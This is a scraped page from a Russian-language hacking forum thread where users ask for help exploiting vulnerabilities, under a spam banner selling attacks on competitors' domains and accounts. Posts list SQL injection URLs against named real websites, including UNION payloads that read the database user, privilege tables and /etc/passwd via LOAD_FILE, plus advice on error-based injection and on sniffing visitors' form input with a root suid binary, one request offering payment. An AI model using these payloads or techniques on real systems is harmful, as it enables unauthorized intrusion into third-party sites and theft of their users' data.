УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2412 из 2438

2412

Опции темы

Поиск в этой теме

Опции просмотра

#24111

11.02.2015, 14:04

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

Кто поможет раскрутить, дам 4 wmz, оч надо)

http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5 Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a 736c29512a&tx_artbase%5Bsearchfield%5D=Craig

ЗЫ интересные символы, когда ошибка появляется и пропадает "?" "Э"

#24112

11.02.2015, 15:38

izzy

Guest

Сообщений: n/a

Провел на форуме:
1142

Репутация: 0

5.0.95-log

http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,user(),12,13,14,15,16,17+--+

snowsoc@server

а теперь хочу узнать привилегии юзера

и тут завис

так http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.use r+where+user='snowsoc'+--+

ошибка Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'snowsoc\' --' at line 1

использую hex http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.use r+where+user=0x736e6f77736f63

ошибка Error 1142 : SELECT command denied to user 'snowsoc'@'server' for table 'user'

что эта ошибка значит?

проверяю через LOAD_FILE('/etc/passwd')

http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,load_file%280x2f6574632f706173737764%29,12 ,13,14,15,16,17--+

выводит страницу сайта и число 10

это значить что привилегии у пользователя есть?

#24113

11.02.2015, 15:42

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от izzy

izzy said:
5.0.95-log
http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,user(),12,13,14,15,16,17+--+
snowsoc@server
а теперь хочу узнать привилегии юзера
и тут завис
так http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.use r+where+user='snowsoc'+--+
ошибка Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'snowsoc\' --' at line 1
использую hex http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.use r+where+user=0x736e6f77736f63
ошибка Error 1142 : SELECT command denied to user 'snowsoc'@'server' for table 'user'
что эта ошибка значит?
проверяю через LOAD_FILE('/etc/passwd')
http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,load_file%280x2f6574632f706173737764%29,12 ,13,14,15,16,17--+
выводит страницу сайта и число 10
это значить что привилегии у пользователя есть?

если бы были привилегии, вы бы получили в ответе файл /etc/passwd

ошибка значит, что вы не можете сделать запрос к этой бд, потому что ее нет.

ознакомтесь со статьей /threadnav43966-1-10.html и прежде чем задавать вопрос поищите решение в гугле или поиском по форуму, на этот вопрос отвечали и не раз

#24114

11.02.2015, 15:53

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от DezMond™

DezMond™ said:
Кто поможет раскрутить, дам 4 wmz, оч надо)
http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5 Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a 736c29512a&tx_artbase%5Bsearchfield%5D=Craig
ЗЫ интересные символы, когда ошибка появляется и пропадает "?" "Э"

Причем здесь деньги? "вопросы по уязвимостям".

У вас там CMS TYPO3, посмотрите публик сплоенты.

#24115

11.02.2015, 17:11

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Цитата:

Сообщение от YaBtr

YaBtr said:
Причем здесь деньги? "
вопросы по уязвимостям
".
У вас там CMS TYPO3, посмотрите публик сплоенты.

Это вознагрождение)

то что там типо3 я и так знаю

#24116

11.02.2015, 18:45

MaxFast

Guest

Сообщений: n/a

Провел на форуме:
178623

Репутация: 94

Мне вот интересно, а как крутится эта инъекция:

Код:

Code:
comingoutspb.com/ru/materialyi-po-proektu?project=[inj]

#24117

11.02.2015, 19:13

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от MaxFast

MaxFast said:
Мне вот интересно, а как крутится эта инъекция:

Код:

Code:
comingoutspb.com/ru/materialyi-po-proektu?project=[inj]

error-based, например через updatexml

XPATH syntax error: ':5.5.41-0+wheezy1'

#24118

14.02.2015, 23:29

Aniweste

Новичок

Регистрация: 28.05.2010

Сообщений: 0

Провел на форуме:
5422

Репутация: 0

Есть рутовый суидник на сайте site.com

Интересует вопрос: как снифить данные с info.php и сохранять их в отдельный файл? Вставить снифер в код - не вариант. Поправить код - тоже. Весь код закодирован.

Поясню:

Пользователь вводит данные на site.com/info.php - как получить эти данные, (данные которые он ввёл на этой странице), имея рутовый суидник, но исключая вариант с изменением/дополнением файла info.php - не вариант.

#24119

14.02.2015, 23:41

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от Aniweste

Aniweste said:
Есть рутовый суидник на сайте site.com
Интересует вопрос: как снифить данные с info.php и сохранять их в отдельный файл? Вставить снифер в код - не вариант. Поправить код - тоже. Весь код закодирован.
Поясню:
Пользователь вводит данные на site.com/info.php - как получить эти данные, (данные которые он ввёл на этой странице), имея рутовый суидник, но исключая вариант с изменением/дополнением файла info.php - не вариант.

tcpdump

#24120

15.02.2015, 14:50

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%5D=6l7f dfdea@mail.com&FE%5Btt_address%5D%5Bname%5D=a'&FE% 5Btt_address%5D%5Bmodule_sys_dmail_category%5D=3&F E%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1

Чет вроде скуля не сложная, но немогу раскрутить...

ЗЫ при правильном вводе, ошибка пропадает, далее меняете 6l7fdfdea@mail.com на другое мыло

Страница 2412 из 2438

2412

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход